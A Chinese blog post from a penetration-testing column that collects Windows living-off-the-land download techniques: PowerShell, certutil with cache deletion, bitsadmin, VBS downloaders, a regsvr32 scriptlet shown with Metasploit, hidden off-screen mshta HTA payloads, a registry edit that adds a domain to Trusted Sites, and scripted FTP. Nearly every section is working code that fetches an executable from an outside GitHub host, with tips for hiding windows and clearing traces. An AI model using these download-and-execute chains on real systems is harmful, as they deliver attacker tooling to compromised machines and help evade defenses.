Window下的文件下载汇总-未完待续

最新推荐文章于 2023-09-26 14:01:37 发布
最新推荐文章于 2023-09-26 14:01:37 发布
阅读量460 收藏
点赞数
分类专栏: 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42255372/article/details/103618283
版权

####1.使用 powershell 的 Syetem.Net.WebClient 进行下载

powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe','C:\Users\31030\Desktop\tools\test\calc.exe')

####2.使用 Invoke-WebRequest 进行下载

powershell (Invoke-WebRequest -Uri "https://github.com/HoldOnToYourHeart/nc/raw/cafb11118be48803396d472ca85c3e7c099b4891/calc.exe" -OutFile "C:\Users\31030\Desktop\tools\test\calc2.exe")

####3.使用 certutil
注:certutil用于备份证书服务xp-win10都支持,由于certutil下载文件都会留下缓存,所以一般都建议下载完文件后对缓存进行删除。
缓存目录为:"%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content"

#下载文件
certutil -urlcache -split -f https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe calc3.exe
#删除缓存
certutil -urlcache -split -f https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe delete

####4.使用 bitsadmin
注:bitsadmin是一个命令行工具,可用于创建下载或上载作业并监视其进度
适用范围:“Windows Server (Semi-Annual Channel), Windows Server 2016, Windows Server 2012 R2, Windows Server 2012,Windows 7,Windows 10”

bitsadmin /transfer n https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe C:\Users\31030\Desktop\tools\test\calc4.exe

####5.利用VBS脚本进行下载
注:将其保存为VBS脚本,可直接在CMD中进行运行。再实际运用中可以选择使用echo写入到文件中,在运行

Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
http.open "GET","https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "C:\Users\31030\Desktop\tools\test\calc5.exe"
ado.Close

Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
http.SetOption 2, 13056
http.open "GET","https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "C:\Users\31030\Desktop\tools\test\calc6.exe"
ado.Close

####6.regsvr32
注:regsvr32表示Microsoft注册服务
语法:Regsvr32 [/s][/u] [/n] [/i[:cmdline]]

这里我使用msf来做个演示
msfconsole
客户端执行
regsvr32
受害机已经上线


这里来简单看一下,首先msf是启动了一个服务,并生成了一个.sct文件。并且可以看到,这个文件中使用WScript.shell 去调用了powershell下载并执行另外一段powershell命令。

所以到这里,我们也就可以通过自己构造.sct文件,去下载执行我们的程序。这里我使用的是上面VBS代码去下载的文件。当然我们也可以通过new ActiveXObject(“WScript.Shell”).Run()去执行命令或者运行程序。
sct文件如下:

<?XML version="1.0"?>
<scriptlet>
	<registration progid="Lwj8h8Cd" classid="{d27b2c13-7e63-b507-eaf0-b4fb4df40559}">
		<script language="VBScript.Encode">
			<![CDATA[ 
				Const adTypeBinary = 1
				Const adSaveCreateOverWrite = 2
				Dim http,ado
				Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
				http.SetOption 2, 13056
				http.open "GET","https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe",False
				http.send
				Set ado = createobject("Adodb.Stream")
				ado.Type = adTypeBinary
				ado.Open
				ado.Write http.responseBody
				ado.SaveToFile "C:\Users\31030\Desktop\tools\test\calc8.exe"
				ado.Close
				]]>
		</script>
	</registration> 
</scriptlet>

####7.mshta
mshta用于执行.hta文件。而hta是HTML Applocation 的缩写,也就是HTML应用程序。而hta中也支持VBS。所以我们可以利用hta来下载文件。
如下:

<HTML> 
<meta http-equiv="x-ua-compatible" content="text/html; charset=utf-8; IE=5">
<HEAD> 
<script language="VBScript.Encode">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
http.SetOption 2, 13056
http.open "GET","https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile "C:\Users\31030\Desktop\tools\test\calc9.exe"
ado.Close
</script>
<body>
test file
</body>
</HEAD> 
</HTML>

这里我把hta文件放到博客中进行测试,mshta提示了错误,其错误原因是我们的域名并不受信任。

而Windows的受信任域名保存在注册表(HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains)中,所以我们可以命令行中直接添加注册表即可

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\holdontoyourheart.github.io" /v https /t REG_DWORD /d 0x00000002 /f

可以看到在注册表中已经添加了我们的域名,并且在Internet中的受信任站点也将我们的域名显示出来。

这个时候我们在去执行一次,可以发现已经成功下载

之所以需要添加到受信任站点,才能执行下载程序的操作是因为Windows本身的安全限制所导致的。所以当我们通过VBScript去下载未信任域名中的程序的时候就会受到限制。

但是我们却可以通过不受信任的域名,使用VBS去执行命令。这里我先将注册表中的信任域名进行删除。然后利用hta文件启动计算器。这里没有任何错误提示
代码如下:

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML>

运行效果
所以到这里,我们能够通过mshta去执行命令,那么我们就可以完全不必再局限于通过VBS去进行下载了。这里我们尝试调用powershell去进行下载。
hat代码如下:

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell (Invoke-WebRequest -Uri 'https://github.com/HoldOnToYourHeart/nc/raw/cafb11118be48803396d472ca85c3e7c099b4891/calc.exe' -OutFile 'C:\Users\31030\Desktop\tools\test\calc10.exe')"
self.close
</script>
<body>
test
</body>
</HEAD> 
</HTML>

运行效果:(由于我没有使用hidden进行隐藏,所以在运行的时候回弹出一个powershell的界面出来)

mshta https://holdontoyourheart.github.io/2019/01/02/Nessus%E6%8A%A5%E5%91%8A%E6%B1%89%E5%8C%96%E7%AF%87%E4%BA%8C/1.hta


###8.ftp
首先我在我的win7虚拟机创建了一个ftp服务器。地址为192.168.52.128
ftp_server
然后我在物理机中执行以下命令

#首先将命令使用ehco写入到文件中
echo open 192.168.52.128  >a.txt & echo get calc.exe>>a.txt &echo bye>>a.txt


#使用ftp进行下载,可以看到已经下载成功。
ftp -A -s:a.txt


ftp命令总结参考:https://www.cnblogs.com/judes/p/9674413.html

目前就整理了这些。后续如果有新姿势会继续更新!

挖低危的清风
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows系统文件usber.zip
11-14
Arduino 驱动所需要的系统文件。
Windows文件下载
攻城狮的物联网基地
08-26 430
if(::URLDownloadToFile(NULL,"http://www.baidu.com","c:\\baidu.html",0,NULL) ==S_OK) { MessageBox("下载完成",NULL,MB_OK); } else { MessageBox("下载失败",NULL,MB_OK); }  
windows 下载文件
weixin_30852451的博客
07-02 145
start powershell $client = new-object system.Net.WebClient $client.DownloadFile('http://sami.haija.org/graph/datasets.tgz','E:\file.tgz') 转载于:https://www.cnblogs.com/tryhardwy/p/11122684.html...
后渗透系列之windows文件下载
kukudeshuo的博客
07-11 1458
在遇到目标服务器是windows服务器时,此篇文章能帮到你windows如何在命令行下面下载文件达到反弹shell的效果
下载文件使用window.open
longwufengxiao的博客
11-19 1449
无论下载什么压缩包还是文档,使用window.open都可以解决。 这是我自己封装的api,接口所需要的参数 request.url是我自己前端跨域的,一般后端跨域,自己弄有点麻烦。 页面直接调用接口就行了。 不需要花里胡哨的。直接通过浏览器下载。 ...
文件下载-.dll文件-windowex.dll(含64位) 文件下载-.dll文件-windowex.dll.zip
01-03
下载Windowex.dll文件的步骤如下: 1. 首先,确保你正在下载的.dll文件来源可靠,因为恶意软件有时会伪装成.dll文件进行传播。 2. 下载完成后,将.zip压缩包解压。确保你有合适的解压工具,如WinRAR或7-Zip。 3. 在...
window 查看文件大小工具 - TreeSizeFreeSetup
10-28
window 查看文件大小工具(TreeSize),window 查看文件大小工具(TreeSize)
Ant Design Pro 下实现文件下载的实现代码
10-15
在Ant Design Pro框架下实现文件下载功能,是前端开发者在开发过程中常遇到的需求。本文将详细介绍如何在Ant Design Pro中实现文件下载功能,涉及到的关键知识点包括如何使用Ajax发送请求,如何处理响应数据,以及...
文件按照window 的排序规则-Java实现
11-23
如果`quiz`是一个文件,那么它本身不能直接参与排序,但如果我们有一个包含多个文件的目录`quiz`,可以按照上述方法对`quiz`目录下的文件进行排序。 7. **注意点**: - 文件路径应正确处理,避免路径分隔符问题。 ...
nginx window下的静态文件服务器
10-22
nginx window下的静态文件服务器 location /file/ { alias D:/upload/test/; #换成你的本地磁盘位置 index autoindex on; }
windows.h 下载
10-14
main header file for the Win32 API windows.h Abstract: Master include file for Windows applications.
WindowBuilder 下载
07-15
WindowBuilderDesigner,Eclipse开发swt,swing,awt,gwt的很好的插件 免费下载!
Window文件夹图标
04-22
文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标文件夹图标,美化文件夹图标 文件夹图标,美化文件夹图标v
Window系统 --- 文件夹
qwxfj的博客
01-07 117
映射
什么是Windows系统文件?
cum43546的博客
09-30 6816
Technically speaking, a Windows system file is any file with the hidden system attribute turned on. In practice, system files are those files that Windows depends upon to operate properly. These range...
window产品下载地址大全
bixuehua的专栏
09-26 625
1. windows 产品下载地址 https://www.wogaosuni.com/forum-7.htm MSDN·Win系统(更新速度快) https://blogs.iapplee.com/msdn/ Windows 11/10 简体中文版最新版(更新较及时) https://www.iruanmi.com/msdn/ (同上) https://xoyozo.net/Software/Windows_Server Windows Server 官方简体中文版 https://xoyozo.
通过浏览器下载文档
weixin_43861449的博客
07-13 571
<a onclick="docDownload('../file/1.docx');">下载</a> function docDownload(filepath){ window.top.location.href="download.html?fileurl="+filepath; } <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> .
Windows文件下载执行的15种姿势
热门推荐
04-15 2万+
当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢?一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。第一...
Windows安装镜像下载
yang5915的专栏
01-28 729
以前官网是可以下载iso的,现在直接在PC的web浏览器中不能直接看到下载入口了。 http://msdn.itellyou.cn/,满足你所有的想象。点开左侧导航栏是列出的各种版本的window操作系统的镜像。
window的gradle-4.8下载
最新发布
12-16
window系统上下载gradle-4.8的方法有多种。首先,可以通过前往gradle官方网站(https://gradle.org/releases/)来下载对应版本的gradle压缩文件。在网站上找到gradle-4.8版本,然后点击下载按钮即可。 另一种方法是通过使用命令行工具来下载gradle-4.8。在命令行中输入以下命令: ```shell $ curl -O https://downloads.gradle-dn.com/distributions/gradle-4.8-all.zip ``` 这将会下载gradle-4.8版本的压缩文件到当前目录。 最后一种方法是通过使用gradle的自动化构建工具来下载自动去下载gradle-4.8。在项目的build.gradle文件中,添加如下代码: ```gradle task downloadGradle(type: Download) { src 'https://downloads.gradle-dn.com/distributions/gradle-4.8-all.zip' dest buildDir } task wrapper(type: Wrapper) { gradleVersion = '4.8' } ``` 然后在命令行中运行以下命令: ```shell $ gradle downloadGradle ``` 这将会自动下载gradle-4.8的压缩文件到当前项目的build目录下。 无论采取哪种方法,下载完成后,解压缩文件,并将gradle-4.8的路径添加到系统的环境变量中,这样就可以在命令行中使用gradle命令来执行构建任务了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值